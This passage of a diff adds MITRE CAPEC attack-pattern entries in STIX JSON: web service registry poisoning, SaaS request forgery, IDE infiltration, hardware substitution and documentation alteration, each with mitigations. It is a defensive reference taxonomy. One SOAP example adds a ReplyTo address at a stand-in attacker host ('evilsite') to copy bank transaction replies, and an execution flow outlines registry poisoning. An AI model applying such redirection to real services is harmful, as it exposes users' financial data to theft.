So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime.\n http://example.com/Message\n http://valid.example/validClient\n http://evilsite/evilClient\n http://validfaults.example/ErrorHandler\n \n \n In this example \"evilsite\" is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with ReplyTo header it will not generate a Soap fault.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a target SOA or Web Service: The adversary must first indentify a target SOA or Web Service.

Experiment

  1. Determine desired outcome: Because poisoning a web service registry can have different outcomes, the adversary must decide how they wish to effect the webservice.

  2. Techniques
    An adversary can perform a denial of service attack on a web service.
    An adversary can redirect requests or responses to a malicious service.
  3. Determine if a malicious service needs to be created: If the adversary wishes to redirect requests or responses, they will need to create a malicious service to redirect to.

  4. Techniques
    Create a service to that requests are sent to in addition to the legitimate service and simply record the requests.
    Create a service that will give malicious responses to a service provider.
    Act as a malicious service provider and respond to requests in an arbitrary way.

Exploit

  1. Poison Web Service Registry: Based on the desired outcome, poison the web service registry. This is done by altering the data at rest in the registry or uploading malicious content by spoofing a service provider.

  2. Techniques
    Intercept and change WS-Adressing headers to route to a malicious service or service provider.
    Provide incorrect information in schema or metadata to cause a denial of service.
    Delete information about service procider interfaces to cause a denial of service.
", + "x_capec_extended_description": "\n WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to write to resources or redirect access to the service registry." + ], + "x_capec_resources_required": [ + "Capability to directly or indirectly modify registry resources" + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9eeb3709-308b-45ca-90e5-649033d1458c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Harden registry server and file access permissions", + "id": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-51-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0a6d5ff3-ab5c-4c1f-b8ed-5faba969ed04", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb6669ba-434f-4a26-8a80-93eacd1b68f0", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement communications to and from the registry using secure protocols", + "id": "course-of-action--6bfceaeb-b87d-430f-aa56-ddb8fa9e9e6f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-51-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dab8cada-a8f1-46a8-a212-2685d9e6bf9d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6bfceaeb-b87d-430f-aa56-ddb8fa9e9e6f", + "target_ref": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user's session. 
This attack is executed after a trusted user is authenticated into a cloud service, \"piggy-backing\" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user's privilege level.", + "external_references": [ + { + "external_id": "CAPEC-510", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/510.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "description": "Ami Luttwak, A new Zeus variant targeting Salesforce.com – Research and Analysis, Adallom, Inc.", + "external_id": "REF-438", + "source_name": "reference_from_CAPEC", + "url": "http://www.adallom.com/blog/a-new-zeus-variant-targeting-salesforce-com-accounts-research-and-analysis/" + } + ], + "id": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "modified": "2014-06-23T00:00:00.000Z", + "name": "SaaS User Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the trusted user's system and convince the user to execute it while authenticated to the SaaS application." + ], + "x_capec_skills_required": { + "Medium": "This attack pattern often requires the technical ability to modify a malicious software package (e.g. Zeus) to spider a targeted site and a way to trick a user into a malicious software download." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To limit one's exposure to this type of attack, tunnel communications through a secure proxy service.", + "id": "course-of-action--e62f0d4e-f4f4-4170-83dc-b3e1355d1c94", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-510-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0e244a6-ae66-4ca3-bd73-5e27032bc927", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e62f0d4e-f4f4-4170-83dc-b3e1355d1c94", + "target_ref": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Detection of this type of attack can be done through heuristic analysis of behavioral anomalies (a la credit card fraud detection) which can be used to identify inhuman behavioral patterns. 
(e.g., spidering)", + "id": "course-of-action--ac725580-35cd-425b-84ba-2c7669ba0116", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-510-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--217875b4-959c-4ec6-a80c-6f5897b54681", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac725580-35cd-425b-84ba-2c7669ba0116", + "target_ref": "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses common delivery mechanisms such as email attachments or removable media to infiltrate the IDE (Integrated Development Environment) of a victim manufacturer with the intent of implanting malware allowing for attack control of the victim IDE environment. The attack then uses this access to exfiltrate sensitive data or information, manipulate said data or information, and conceal these actions. This will allow and aid the attack to meet the goal of future compromise of a recipient of the victim's manufactured product further down in the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-511", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/511.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Infiltration of Software Development Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "The attacker, knowing the victim runs email on a system adjacent to the IDE system, sends a phishing email with a malicious attachment to the victim. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent IDE system from the victim's workstation. The attacker is then able to exfiltrate sensitive data about the software being developed on the IDE system.", + "Using rogue versions of Xcode (Apple's app development tool) downloaded from third-party websites, it was possible for the adversary to insert malicious code into legitimate apps during the development process." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).", + "The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.", + "The attacker must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure." 
+ ], + "x_capec_skills_required": { + "High": "Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)", + "Medium": "Intelligence about the manufacturer's operating environment and infrastructure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid the common delivery mechanisms of adversaries, such as email attachments, which could introduce the malware.", + "id": "course-of-action--93c2b59e-bb08-4808-9f42-695b972f908e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-511-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--acf31545-11ce-4c74-9740-158a6572cd6c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93c2b59e-bb08-4808-9f42-695b972f908e", + "target_ref": "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to system components during allocated baseline development can substitute a maliciously altered hardware component for a baseline component during the product development and research phases. 
This can lead to adjustments and calibrations being made in the product so that when the final product, now containing the modified component, is deployed it will not perform as designed and be advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-516", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/516.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution During Baselining", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary supplies the product development facility of a network security device with a hardware component that is used to simulate large volumes of network traffic. 
The device claims in logs, stats, and via the display panel to be pumping out very large quantities of network traffic, when it is in fact putting out very low volumes. The developed product is adjusted and configured to handle what it believes to be a heavy network load, but when deployed at the victim site the large volumes of network traffic are dropped instead of being processed by the network security device. This allows the adversary an advantage when attacking the victim in that the adversary's presence may not be detected by the device.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary will need either physical access or be able to supply malicious hardware components to the product development facility." + ], + "x_capec_skills_required": { + "High": "Resources to physically infiltrate supplier.", + "Medium": "Intelligence data on victim's purchasing habits." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hardware attacks are often difficult to detect, as inserted components can be difficult to identify or remain dormant for an extended period of time.", + "id": "course-of-action--fb844bff-17ce-4a81-b7c9-d963af144f72", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66c31447-50cf-486f-9c66-c9a60af6772c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--fb844bff-17ce-4a81-b7c9-d963af144f72", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.", + "id": "course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dcf9dff1-8779-42aa-b16f-b9a8537f2e04", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9", + "target_ref": "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation, which include descriptions of advanced technology and/or specific components' criticality, alters the documents to circumvent dial-down functionality requirements. 
This alteration would change the interpretation of implementation and manufacturing techniques, allowing for advanced technologies to remain in place even though these technologies might be restricted to certain customers, such as nations on the terrorist watch list, giving the attacker on the receiving end of a shipped product access to an advanced technology that might otherwise be restricted.", + "external_references": [ + { + "external_id": "CAPEC-517", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/517.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Circumvent Dial-down", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "A product for manufacture exists that contains advanced cryptographic capabilities, including algorithms that are restricted from being shipped to some nations. 
An attacker from one of the restricted nations alters the documentation to ensure that when the product is manufactured for shipment to a restricted nation, the software compilation steps that normally would prevent the advanced cryptographic capabilities from being included are actually included. When the product is shipped to the attacker's home country, the attacker is able to retrieve and/or use the advanced cryptographic capabilities." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of internal software and hardware components within manufacturer's development environment.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Digitize documents and cryptographically sign them to verify authenticity.", + "id": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6cdce0e6-c111-4a35-bd94-2fd9bc65869b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { 
+ "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Password protect documents and make them read-only for unauthorized users.", + "id": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1a2f5635-3164-4960-8cc1-c813d8955f6c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid emailing important documents and configurations.", + "id": "course-of-action--846a9f00-d294-480b-b806-4b61a6dc9ebb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--de958332-453b-4c56-9e15-f562941f06cf", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--846a9f00-d294-480b-b806-4b61a6dc9ebb", + "target_ref": 
"attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure deleted files are actually deleted.", + "id": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e4cacf14-7742-4ddf-95a4-24294756229f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9347e41c-c794-41f7-8521-f8c6b76de2b4", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain backups of the document for recovery and verification.", + "id": "course-of-action--b0455d25-551c-4791-a1fa-a71d534d7c5d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38d7d40a-e9d8-4f1e-802a-9fe83f5555c9", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--b0455d25-551c-4791-a1fa-a71d534d7c5d", + "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to a manufacturer's documentation alters the descriptions of system capabilities with the intent of causing errors in derived system requirements, impacting the overall effectiveness and capability of the system, allowing an attacker to take advantage of the introduced system capability flaw once the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-518", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/518.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Marie Prokopets, How To Secure Your Documents, Nira", + "external_id": "REF-715", + "source_name": "reference_from_CAPEC", + "url": "https://nira.com/how-to-secure-your-documents/" + } + ], + "id": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Documentation Alteration to Produce Under-performing Systems", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "A security subsystem involving encryption is a part of a product, but due to the demands of this subsystem during operation, the subsystem only runs when a 
specific amount of memory and processing is available. An attacker alters the descriptions of the system capabilities so that when deployed with the minimal requirements at the victim location, the encryption subsystem is never operational, leaving the system in a weakened security state." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Advanced knowledge of software and hardware capabilities of a manufacturer's product.", + "Access to the manufacturer's documentation." + ], + "x_capec_skills_required": { + "High": "Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec5bea13-d325-4683-9122-b0c7ccec06d4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2f2411fc-5d76-4d08-bdbd-af07cb72a148", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--281d70fc-8c58-4d68-b561-0575eb42bff4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "target_ref": "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
